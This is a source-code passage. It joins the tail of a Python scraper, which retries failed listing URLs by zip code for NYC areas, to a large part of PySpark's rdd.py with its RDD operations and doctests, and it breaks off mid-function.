    Successfully handled URLs are removed from the failure counter.
    """
    failed_urls = set(self.failed_urls.keys())
    if not failed_urls:
        return
    while failed_urls:
        try:
            current_url = failed_urls.pop()
            if current_url in self.visited_sites:
                continue
            if 'home' in current_url:
                # Landing page: rebuild its result URLs and queue them too.
                zip_code = current_url.split('/')[-1].replace('_rb', '')
                failed_urls.update(self.find_urls(zip_code))
            else:
                # BUG FIX (duplication): the original had two byte-identical
                # branches for '_p' (paginated) and plain URLs; merged here.
                try:
                    page_soup = self.fetch(current_url)
                except MaxTriesError:
                    continue
                if self.is_empty(page_soup):
                    self.empty_pages.add(current_url)
                    continue
                self.process_page(page_soup, current_url, zip_code)
            if current_url in self.failed_urls.keys():
                self.failed_urls.pop(current_url)
        except IndexError:
            break  # No items left
class MaxTriesError(Exception):
    """Raised when a URL keeps failing past the scraper's retry budget."""
    pass
if __name__ == "__main__":
    # Test scraper on one page.
    # asyncio.run(do_something())
    # Seed the zip-code set from the covid dataset, then union in NYC-area
    # zip codes that are not present in the CSV.
    df = pd.read_csv("data/zip_codes_x_covid.csv")
    zip_codes = set(df['Zip_code'].tolist())
    zip_codes = zip_codes.union(
        {10280, 10282, 10301, 10302, 10303, 10304, 10305, 10306, 10307, 10308, 10309, 10310, 10312, 10314, 11355, 11357,
         11418, 11419, 11420, 11421, 11422, 11426, 11427, 11428, 11429, 11432, 11433, 11434, 11435, 11436, 10451, 10452,
         10453, 10455, 10456, 10457, 10458, 10459, 10460, 10461, 10462, 10463, 10464, 10465, 10466, 10467, 10468, 10469,
         10470, 10471, 10472, 10473, 10474, 10475, 11001, 11004, 10001, 10002, 10004, 10007, 10009, 10010, 10011, 10013,
         10014, 10019, 10021, 10023, 10024, 10025, 10026, 10027, 10028, 10029, 10030, 10031, 10032, 10033, 10034, 10035,
         10036, 10037, 10038, 10039, 10040, 10044, 10065, 10075, 11109, 10541})
    s = Scraper(zip_codes)
    s.run()
|
rdd.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from base64 import standard_b64encode as b64enc
import copy
from collections import defaultdict
from collections import namedtuple
from itertools import chain, ifilter, imap
import operator
import os
import sys
import shlex
import traceback
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
import warnings
import heapq
from random import Random
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, pack_long
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def _extract_concise_traceback():
"""
This function returns the traceback info for a callsite, returns a dict
with function name, file name and line number
"""
tb = traceback.extract_stack()
callsite = namedtuple("Callsite", "function file linenum")
if len(tb) == 0:
return None
file, line, module, what = tb[len(tb) - 1]
sparkpath = os.path.dirname(file)
first_spark_frame = len(tb) - 1
for i in range(0, len(tb)):
file, line, fun, what = tb[i]
if file.startswith(sparkpath):
first_spark_frame = i
break
if first_spark_frame == 0:
file, line, fun, what = tb[0]
return callsite(function=fun, file=file, linenum=line)
sfile, sline, sfun, swhat = tb[first_spark_frame]
ufile, uline, ufun, uwhat = tb[first_spark_frame-1]
return callsite(function=sfun, file=ufile, linenum=uline)
_spark_stack_depth = 0
class _JavaStackTrace(object):
    """Context manager that tags the JVM with the Python call site.

    Only the outermost nesting level sets/clears the call site; the depth is
    tracked in the module-global _spark_stack_depth.
    """
    def __init__(self, sc):
        info = _extract_concise_traceback()
        if info is None:
            self._traceback = "Error! Could not extract traceback info"
        else:
            self._traceback = "%s at %s:%s" % (info.function, info.file, info.linenum)
        self._context = sc

    def __enter__(self):
        global _spark_stack_depth
        if _spark_stack_depth == 0:
            self._context._jsc.setCallSite(self._traceback)
        _spark_stack_depth += 1

    def __exit__(self, type, value, tb):
        global _spark_stack_depth
        _spark_stack_depth -= 1
        if _spark_stack_depth == 0:
            self._context._jsc.setCallSite(None)
class MaxHeapQ(object):
    """
    An implementation of MaxHeap, bounded at *maxsize* elements: it retains
    the maxsize smallest values ever inserted.
    >>> import pyspark.rdd
    >>> heap = pyspark.rdd.MaxHeapQ(5)
    >>> [heap.insert(i) for i in range(10)]
    [None, None, None, None, None, None, None, None, None, None]
    >>> sorted(heap.getElements())
    [0, 1, 2, 3, 4]
    >>> heap = pyspark.rdd.MaxHeapQ(5)
    >>> [heap.insert(i) for i in range(9, -1, -1)]
    [None, None, None, None, None, None, None, None, None, None]
    >>> sorted(heap.getElements())
    [0, 1, 2, 3, 4]
    >>> heap = pyspark.rdd.MaxHeapQ(1)
    >>> [heap.insert(i) for i in range(9, -1, -1)]
    [None, None, None, None, None, None, None, None, None, None]
    >>> heap.getElements()
    [0]
    """

    def __init__(self, maxsize):
        # we start from q[1], this makes calculating children as trivial as 2 * k
        self.q = [0]
        self.maxsize = maxsize

    def _swim(self, k):
        # Bubble q[k] up while it is larger than its parent.
        # BUG FIX: use // (floor division) instead of /: identical for these
        # positive ints under Python 2, but / yields float indices (TypeError)
        # under Python 3.
        while (k > 1) and (self.q[k // 2] < self.q[k]):
            self._swap(k, k // 2)
            k = k // 2

    def _swap(self, i, j):
        # Exchange two heap slots.
        t = self.q[i]
        self.q[i] = self.q[j]
        self.q[j] = t

    def _sink(self, k):
        # Push q[k] down until both children are smaller.
        N = self.size()
        while 2 * k <= N:
            j = 2 * k
            # Here we test if both children are greater than parent
            # if not swap with larger one.
            if j < N and self.q[j] < self.q[j + 1]:
                j = j + 1
            if(self.q[k] > self.q[j]):
                break
            self._swap(k, j)
            k = j

    def size(self):
        # Slot 0 is a sentinel, so the element count is len - 1.
        return len(self.q) - 1

    def insert(self, value):
        if (self.size()) < self.maxsize:
            self.q.append(value)
            self._swim(self.size())
        else:
            self._replaceRoot(value)

    def getElements(self):
        return self.q[1:]

    def _replaceRoot(self, value):
        # Only values smaller than the current max displace the root.
        if(self.q[1] > value):
            self.q[1] = value
            self._sink(1)
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer):
    """Wrap Java RDD *jrdd* created on SparkContext *ctx*.

    jrdd_deserializer turns the Java-side byte stream into Python objects.
    """
    self._jrdd = jrdd
    self.is_cached = False          # flipped by cache()/persist()
    self.is_checkpointed = False    # flipped by checkpoint()
    self.ctx = ctx
    self._jrdd_deserializer = jrdd_deserializer
    self._id = jrdd.id()  # cached so id() avoids a Java round-trip
def id(self):
    """
    A unique ID for this RDD (within its SparkContext).
    """
    return self._id  # captured from the Java RDD at construction time
def __repr__(self):
    # Delegate to the Java RDD's toString for the debug representation.
    return self._jrdd.toString()
@property
def context(self):
    """
    The L{SparkContext} that this RDD was created on.
    """
    return self.ctx  # read-only view of the ctx passed to __init__
def cache(self):
    """
    Persist this RDD with the default storage level (C{MEMORY_ONLY}).

    Returns this RDD so calls can be chained.
    """
    self.is_cached = True
    self._jrdd.cache()
    return self
def persist(self, storageLevel):
    """
    Set this RDD's storage level to persist its values across operations after the first time
    it is computed. This can only be used to assign a new storage level if the RDD does not
    have a storage level set yet.

    Returns this RDD so calls can be chained.
    """
    self.is_cached = True
    # Translate the Python StorageLevel into its Java equivalent.
    javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
    self._jrdd.persist(javaStorageLevel)
    return self
def unpersist(self):
    """
    Mark the RDD as non-persistent, and remove all blocks for it from memory and disk.

    Returns this RDD so calls can be chained.
    """
    self.is_cached = False
    self._jrdd.unpersist()
    return self
def checkpoint(self):
    """
    Mark this RDD for checkpointing. It will be saved to a file inside the
    checkpoint directory set with L{SparkContext.setCheckpointDir()} and
    all references to its parent RDDs will be removed. This function must
    be called before any job has been executed on this RDD. It is strongly
    recommended that this RDD is persisted in memory, otherwise saving it
    on a file will require recomputation.
    """
    self.is_checkpointed = True
    # Checkpointing is requested on the underlying (unwrapped) Java RDD.
    self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
    """
    Return whether this RDD has been checkpointed or not.

    Asks the Java side, so this reflects actual checkpoint state rather
    than the local is_checkpointed flag.
    """
    return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
    """
    Gets the name of the file to which this RDD was checkpointed,
    or None when the RDD has not been checkpointed.
    """
    # The Java side returns an Option; unwrap it here.
    checkpointFile = self._jrdd.rdd().getCheckpointFile()
    return checkpointFile.get() if checkpointFile.isDefined() else None
def map(self, f, preservesPartitioning=False):
    """
    Return a new RDD by applying a function to each element of this RDD.
    >>> rdd = sc.parallelize(["b", "a", "c"])
    >>> sorted(rdd.map(lambda x: (x, 1)).collect())
    [('a', 1), ('b', 1), ('c', 1)]
    """
    def apply_map(split, iterator):
        return imap(f, iterator)
    return PipelinedRDD(self, apply_map, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
    """
    Return a new RDD by first applying a function to all elements of this
    RDD, and then flattening the results.
    >>> rdd = sc.parallelize([2, 3, 4])
    >>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
    [1, 1, 1, 2, 2, 3]
    >>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
    [(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
    """
    def apply_flat(split, iterator):
        return chain.from_iterable(imap(f, iterator))
    return self.mapPartitionsWithIndex(apply_flat, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
    """
    Return a new RDD by applying a function to each partition of this RDD.
    >>> rdd = sc.parallelize([1, 2, 3, 4], 2)
    >>> def f(iterator): yield sum(iterator)
    >>> rdd.mapPartitions(f).collect()
    [3, 7]
    """
    def func(s, iterator):
        # Adapt the partition function to the (index, iterator) signature.
        return f(iterator)
    # BUG FIX: preservesPartitioning was previously dropped here, so callers
    # asking to keep the partitioner silently lost it.
    return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
    """
    Return a new RDD by applying a function to each partition of this RDD,
    while tracking the index of the original partition.
    >>> rdd = sc.parallelize([1, 2, 3, 4], 4)
    >>> def f(splitIndex, iterator): yield splitIndex
    >>> rdd.mapPartitionsWithIndex(f).sum()
    6
    """
    # PipelinedRDD fuses successive narrow transformations into one pass.
    return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
    """
    Deprecated: use mapPartitionsWithIndex instead.
    Return a new RDD by applying a function to each partition of this RDD,
    while tracking the index of the original partition.
    >>> rdd = sc.parallelize([1, 2, 3, 4], 4)
    >>> def f(splitIndex, iterator): yield splitIndex
    >>> rdd.mapPartitionsWithSplit(f).sum()
    6
    """
    # stacklevel=2 points the warning at the caller, not this wrapper.
    warnings.warn("mapPartitionsWithSplit is deprecated; "
        "use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
    return self.mapPartitionsWithIndex(f, preservesPartitioning)
def filter(self, f):
    """
    Return a new RDD containing only the elements that satisfy a predicate.
    >>> rdd = sc.parallelize([1, 2, 3, 4, 5])
    >>> rdd.filter(lambda x: x % 2 == 0).collect()
    [2, 4]
    """
    def keep_matching(iterator):
        return ifilter(f, iterator)
    return self.mapPartitions(keep_matching)
def distinct(self):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x) \
.map(lambda (x, _): x)
def sample(self, withReplacement, fraction, seed=None):
    """
    Return a sampled subset of this RDD (relies on numpy and falls back
    on default random generator if numpy is unavailable).
    >>> sc.parallelize(range(0, 100)).sample(False, 0.1, 2).collect() #doctest: +SKIP
    [2, 3, 20, 21, 24, 41, 42, 66, 67, 89, 90, 98]
    """
    assert fraction >= 0.0, "Invalid fraction value: %s" % fraction
    # RDDSampler.func performs per-partition sampling; partitioning is preserved.
    return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
    """
    Return a fixed-size sampled subset of this RDD (currently requires numpy).

    Raises ValueError when num is negative.
    >>> sc.parallelize(range(0, 10)).takeSample(True, 10, 1) #doctest: +SKIP
    [4, 2, 1, 8, 2, 7, 0, 4, 1, 4]
    """
    fraction = 0.0
    total = 0
    multiplier = 3.0  # oversampling factor so one pass usually suffices
    initialCount = self.count()
    maxSelected = 0
    if (num < 0):
        raise ValueError
    if (initialCount == 0):
        return list()
    # Clamp to the largest representable size (sys.maxint is Python 2 only).
    if initialCount > sys.maxint - 1:
        maxSelected = sys.maxint - 1
    else:
        maxSelected = initialCount
    if num > initialCount and not withReplacement:
        # Can't return more distinct elements than exist: take them all.
        total = maxSelected
        fraction = multiplier * (maxSelected + 1) / initialCount
    else:
        fraction = multiplier * (num + 1) / initialCount
        total = num
    samples = self.sample(withReplacement, fraction, seed).collect()
    # If the first sample didn't turn out large enough, keep trying to take samples;
    # this shouldn't happen often because we use a big multiplier for their initial size.
    # See: scala/spark/RDD.scala
    rand = Random(seed)
    while len(samples) < total:
        samples = self.sample(withReplacement, fraction, rand.randint(0, sys.maxint)).collect()
    # Shuffle locally so the returned prefix is an unbiased selection.
    sampler = RDDSampler(withReplacement, fraction, rand.randint(0, sys.maxint))
    sampler.shuffle(samples)
    return samples[0:total]
def union(self, other):
    """
    Return the union of this RDD and another one.
    >>> rdd = sc.parallelize([1, 1, 2, 3])
    >>> rdd.union(rdd).collect()
    [1, 1, 2, 3, 1, 1, 2, 3]
    """
    if self._jrdd_deserializer != other._jrdd_deserializer:
        # These RDDs contain data in different serialized formats, so we
        # must normalize them to the default serializer.
        left = self._reserialize()
        right = other._reserialize()
        return RDD(left._jrdd.union(right._jrdd), self.ctx,
                   self.ctx.serializer)
    return RDD(self._jrdd.union(other._jrdd), self.ctx,
               self._jrdd_deserializer)
def intersection(self, other):
    """
    Return the intersection of this RDD and another one. The output will not
    contain any duplicate elements, even if the input RDDs did.
    Note that this method performs a shuffle internally.
    >>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
    >>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
    >>> rdd1.intersection(rdd2).collect()
    [1, 2, 3]
    """
    # Key each element, cogroup, and keep keys present on both sides.
    keyed_self = self.map(lambda v: (v, None))
    keyed_other = other.map(lambda v: (v, None))
    grouped = keyed_self.cogroup(keyed_other)
    in_both = grouped.filter(lambda x: (len(x[1][0]) != 0) and (len(x[1][1]) != 0))
    return in_both.keys()
def _reserialize(self):
    # Re-encode the data with the context's default serializer; the
    # identity map forces a pass through PipelinedRDD's serialization.
    if self._jrdd_deserializer == self.ctx.serializer:
        return self
    return self.map(lambda x: x, preservesPartitioning=True)
def __add__(self, other):
    """
    Return the union of this RDD and another one.
    >>> rdd = sc.parallelize([1, 1, 2, 3])
    >>> (rdd + rdd).collect()
    [1, 1, 2, 3, 1, 1, 2, 3]
    """
    if isinstance(other, RDD):
        return self.union(other)
    raise TypeError
def sortByKey(self, ascending=True, numPartitions=None, keyfunc = lambda x: x):
    """
    Sorts this RDD, which is assumed to consist of (key, value) pairs.
    >>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
    >>> sc.parallelize(tmp).sortByKey(True, 2).collect()
    [('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
    >>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
    >>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
    >>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
    [('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5), ('little', 4), ('Mary', 1), ('was', 8), ('white', 9), ('whose', 6)]
    """
    if numPartitions is None:
        numPartitions = self.ctx.defaultParallelism
    bounds = list()
    # first compute the boundary of each part via sampling: we want to partition
    # the key-space into bins such that the bins have roughly the same
    # number of (key, value) pairs falling into them
    if numPartitions > 1:
        rddSize = self.count()
        maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
        fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
        samples = self.sample(False, fraction, 1).map(lambda (k, v): k).collect()
        samples = sorted(samples, reverse=(not ascending), key=keyfunc)
        # we have numPartitions many parts but one of the them has
        # an implicit boundary
        for i in range(0, numPartitions - 1):
            # Python 2 integer division picks evenly spaced sample indices.
            index = (len(samples) - 1) * (i + 1) / numPartitions
            bounds.append(samples[index])
    def rangePartitionFunc(k):
        # Linear scan over the (small) bounds list to find the bin for k.
        p = 0
        while p < len(bounds) and keyfunc(k) > bounds[p]:
            p += 1
        if ascending:
            return p
        else:
            # Descending order reverses the partition indices.
            return numPartitions-1-p
    def mapFunc(iterator):
        # Sort each range-partitioned chunk locally.
        yield sorted(iterator, reverse=(not ascending), key=lambda (k, v): keyfunc(k))
    return (self.partitionBy(numPartitions, partitionFunc=rangePartitionFunc)
            .mapPartitions(mapFunc,preservesPartitioning=True)
            .flatMap(lambda x: x, preservesPartitioning=True))
def glom(self):
    """
    Return an RDD created by coalescing all elements within each partition
    into a list.
    >>> rdd = sc.parallelize([1, 2, 3, 4], 2)
    >>> sorted(rdd.glom().collect())
    [[1, 2], [3, 4]]
    """
    def as_list(iterator):
        yield list(iterator)
    return self.mapPartitions(as_list)
def cartesian(self, other):
    """
    Return the Cartesian product of this RDD and another one, that is, the
    RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
    C{b} is in C{other}.
    >>> rdd = sc.parallelize([1, 2])
    >>> sorted(rdd.cartesian(rdd).collect())
    [(1, 1), (1, 2), (2, 1), (2, 2)]
    """
    # Due to batching, we can't use the Java cartesian method.
    # CartesianDeserializer knows how to unbatch and pair the two streams.
    deserializer = CartesianDeserializer(self._jrdd_deserializer,
                                         other._jrdd_deserializer)
    return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
    """
    Return an RDD of grouped items.
    >>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
    >>> result = rdd.groupBy(lambda x: x % 2).collect()
    >>> sorted([(x, sorted(y)) for (x, y) in result])
    [(0, [2, 8]), (1, [1, 1, 3, 5])]
    """
    keyed = self.map(lambda x: (f(x), x))
    return keyed.groupByKey(numPartitions)
def pipe(self, command, env={}):
    """
    Return an RDD created by piping elements to a forked external process.

    Each element is written to the process's stdin as one line; each line of
    its stdout becomes one output element.
    >>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
    ['1', '2', '', '3']
    """
    def func(iterator):
        pipe = Popen(shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
        def pipe_objs(out):
            # Feed elements line-by-line, then close stdin so the child exits.
            for obj in iterator:
                out.write(str(obj).rstrip('\n') + '\n')
            out.close()
        # Write on a separate thread to avoid deadlocking on full OS pipes.
        Thread(target=pipe_objs, args=[pipe.stdin]).start()
        return (x.rstrip('\n') for x in iter(pipe.stdout.readline, ''))
    return self.mapPartitions(func)
def foreach(self, f):
    """
    Applies a function to all elements of this RDD.
    >>> def f(x): print x
    >>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
    """
    def apply_to_partition(iterator):
        for element in iterator:
            f(element)
        yield None
    self.mapPartitions(apply_to_partition).collect()  # Force evaluation
def foreachPartition(self, f):
    """
    Applies a function to each partition of this RDD.
    >>> def f(iterator):
    ...      for x in iterator:
    ...           print x
    ...      yield None
    >>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
    """
    self.mapPartitions(f).collect()  # Force evaluation
def collect(self):
    """
    Return a list that contains all of the elements in this RDD.
    """
    # Tag the JVM with the Python call site for better Spark UI names.
    with _JavaStackTrace(self.context) as st:
        bytesInJava = self._jrdd.collect().iterator()
    return list(self._collect_iterator_through_file(bytesInJava))
def _collect_iterator_through_file(self, iterator):
    # Transferring lots of data through Py4J can be slow because
    # socket.readline() is inefficient. Instead, we'll dump the data to a
    # file and read it back.
    tempFile = NamedTemporaryFile(delete=False, dir=self.ctx._temp_dir)
    tempFile.close()
    self.ctx._writeToFile(iterator, tempFile.name)
    # Read the data into Python and deserialize it:
    # (note: the `with` deliberately rebinds tempFile to the reopened handle)
    with open(tempFile.name, 'rb') as tempFile:
        for item in self._jrdd_deserializer.load_stream(tempFile):
            yield item
    os.unlink(tempFile.name)  # clean up since delete=False above
def reduce(self, f):
    """
    Reduces the elements of this RDD using the specified commutative and
    associative binary operator. Currently reduces partitions locally.
    >>> from operator import add
    >>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
    15
    >>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
    10
    """
    def reduce_partition(iterator):
        # Fold each partition locally; empty partitions yield nothing.
        acc = None
        for obj in iterator:
            acc = obj if acc is None else f(obj, acc)
        if acc is not None:
            yield acc
    vals = self.mapPartitions(reduce_partition).collect()
    return reduce(f, vals)
def fold(self, zeroValue, op):
    """
    Aggregate the elements of each partition, and then the results for all
    the partitions, using a given associative function and a neutral "zero
    value."
    The function C{op(t1, t2)} is allowed to modify C{t1} and return it
    as its result value to avoid object allocation; however, it should not
    modify C{t2}.
    >>> from operator import add
    >>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
    15
    """
    def fold_partition(iterator):
        acc = zeroValue
        for obj in iterator:
            acc = op(obj, acc)
        yield acc
    partials = self.mapPartitions(fold_partition).collect()
    # Combine the per-partition results, seeded with the zero value again.
    return reduce(op, partials, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
    """
    Aggregate the elements of each partition, and then the results for all
    the partitions, using a given combine functions and a neutral "zero
    value."
    The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
    as its result value to avoid object allocation; however, it should not
    modify C{t2}.
    The first function (seqOp) can return a different result type, U, than
    the type of this RDD. Thus, we need one operation for merging a T into an U
    and one operation for merging two U
    >>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
    >>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
    >>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
    (10, 4)
    >>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
    (0, 0)
    """
    def aggregate_partition(iterator):
        acc = zeroValue
        for obj in iterator:
            acc = seqOp(acc, obj)
        yield acc
    # Merge the per-partition accumulators with combOp.
    return self.mapPartitions(aggregate_partition).fold(zeroValue, combOp)
def max(self):
    """
    Find the maximum item in this RDD.
    >>> sc.parallelize([1.0, 5.0, 43.0, 10.0]).max()
    43.0
    """
    return self.reduce(max)  # builtin max as the pairwise reducer
def min(self):
    """
    Find the minimum item in this RDD.
    >>> sc.parallelize([1.0, 5.0, 43.0, 10.0]).min()
    1.0
    """
    return self.reduce(min)  # builtin min as the pairwise reducer
def sum(self):
    """
    Add up the elements in this RDD.
    >>> sc.parallelize([1.0, 2.0, 3.0]).sum()
    6.0
    """
    def partition_total(iterator):
        return [sum(iterator)]
    return self.mapPartitions(partition_total).reduce(operator.add)
def count(self):
    """
    Return the number of elements in this RDD.
    >>> sc.parallelize([2, 3, 4]).count()
    3
    """
    def partition_size(iterator):
        return [sum(1 for _ in iterator)]
    return self.mapPartitions(partition_size).sum()
def stats(self):
    """
    Return a L{StatCounter} object that captures the mean, variance
    and count of the RDD's elements in one operation.
    """
    def redFunc(left_counter, right_counter):
        # StatCounter.mergeStats combines two partial summaries.
        return left_counter.mergeStats(right_counter)
    return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def mean(self):
    """
    Compute the mean of this RDD's elements.
    >>> sc.parallelize([1, 2, 3]).mean()
    2.0
    """
    return self.stats().mean()  # delegates to the distributed StatCounter
def variance(self):
    """
    Compute the variance of this RDD's elements.
    >>> sc.parallelize([1, 2, 3]).variance()
    0.666...
    """
    return self.stats().variance()  # delegates to the distributed StatCounter
def stdev(self):
    """
    Compute the standard deviation of this RDD's elements.
    >>> sc.parallelize([1, 2, 3]).stdev()
    0.816...
    """
    return self.stats().stdev()  # delegates to the distributed StatCounter
def sampleStdev(self):
    """
    Compute the sample standard deviation of this RDD's elements (which corrects for bias in
    estimating the standard deviation by dividing by N-1 instead of N).
    >>> sc.parallelize([1, 2, 3]).sampleStdev()
    1.0
    """
    return self.stats().sampleStdev()  # delegates to the distributed StatCounter
def sampleVariance(self):
    """
    Compute the sample variance of this RDD's elements (which corrects for bias in
    estimating the variance by dividing by N-1 instead of N).
    >>> sc.parallelize([1, 2, 3]).sampleVariance()
    1.0
    """
    return self.stats().sampleVariance()  # delegates to the distributed StatCounter
def countByValue(self):
    """
    Return the count of each unique value in this RDD as a dictionary of
    (value, count) pairs.
    >>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
    [(1, 2), (2, 3)]
    """
    def tally_partition(iterator):
        tallies = defaultdict(int)
        for item in iterator:
            tallies[item] += 1
        yield tallies
    def merge_tallies(left, right):
        # Fold the right-hand map into the left-hand one.
        for (value, count) in right.iteritems():
            left[value] += count
        return left
    return self.mapPartitions(tally_partition).reduce(merge_tallies)
def top(self, num):
    """
    Get the top N elements from a RDD.
    Note: It returns the list sorted in descending order.
    >>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
    [12]
    >>> sc.parallelize([2, 3, 4, 5, 6], 2).cache().top(2)
    [6, 5]
    """
    def keep_largest(iterator):
        # Min-heap of size num holds the largest items seen so far.
        heap = []
        for item in iterator:
            if len(heap) < num:
                heapq.heappush(heap, item)
            else:
                heapq.heappushpop(heap, item)
        yield heap
    def combine(left, right):
        return next(keep_largest(left + right))
    return sorted(self.mapPartitions(keep_largest).reduce(combine), reverse=True)
def takeOrdered(self, num, key=None):
    """
    Get the N elements from a RDD ordered in ascending order or as specified
    by the optional key function.
    >>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
    [1, 2, 3, 4, 5, 6]
    >>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
    [10, 9, 7, 6, 5, 4]
    """
    def topNKeyedElems(iterator, key_=None):
        # Bounded max-heap keeps the num smallest (by key) elements.
        q = MaxHeapQ(num)
        for k in iterator:
            if key_ != None:
                k = (key_(k), k)  # decorate so the heap orders by key
            q.insert(k)
        yield q.getElements()
    def unKey(x, key_=None):
        # Strip the (key, value) decoration applied above.
        if key_ != None:
            x = [i[1] for i in x]
        return x
    def merge(a, b):
        # Elements arriving here are already decorated, so no key_ is passed.
        return next(topNKeyedElems(a + b))
    result = self.mapPartitions(lambda i: topNKeyedElems(i, key)).reduce(merge)
    return sorted(unKey(result, key), key=key)
def take(self, num):
    """
    Take the first num elements of the RDD.
    It works by first scanning one partition, and use the results from
    that partition to estimate the number of additional partitions needed
    to satisfy the limit.
    Translated from the Scala implementation in RDD#take().
    >>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
    [2, 3]
    >>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
    [2, 3, 4, 5, 6]
    >>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
    [91, 92, 93]
    """
    items = []
    totalParts = self._jrdd.splits().size()
    partsScanned = 0
    while len(items) < num and partsScanned < totalParts:
        # The number of partitions to try in this iteration.
        # It is ok for this number to be greater than totalParts because
        # we actually cap it at totalParts in runJob.
        numPartsToTry = 1
        if partsScanned > 0:
            # If we didn't find any rows after the first iteration, just
            # try all partitions next. Otherwise, interpolate the number
            # of partitions we need to try, but overestimate it by 50%.
            if len(items) == 0:
                numPartsToTry = totalParts - 1
            else:
                numPartsToTry = int(1.5 * num * partsScanned / len(items))
        left = num - len(items)
        def takeUpToNumLeft(iterator):
            # Closes over `left`; a short partition simply ends iteration
            # when next() raises StopIteration (Python 2 generator behavior).
            taken = 0
            while taken < left:
                yield next(iterator)
                taken += 1
        p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
        res = self.context.runJob(self, takeUpToNumLeft, p, True)
        items += res
        partsScanned += numPartsToTry
    return items[:num]
def first(self):
    """
    Return the first element in this RDD.

    Note: raises IndexError when the RDD is empty (take(1) returns []).
    >>> sc.parallelize([2, 3, 4]).first()
    2
    """
    return self.take(1)[0]
def saveAsTextFile(self, path):
    """
    Save this RDD as a text file, using string representations of elements.
    >>> tempFile = NamedTemporaryFile(delete=True)
    >>> tempFile.close()
    >>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
    >>> from fileinput import input
    >>> from glob import glob
    >>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
    '0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
    Empty lines are tolerated when saving to text files.
    >>> tempFile2 = NamedTemporaryFile(delete=True)
    >>> tempFile2.close()
    >>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
    >>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
    '\\n\\n\\nbar\\nfoo\\n'
    """
    def func(split, iterator):
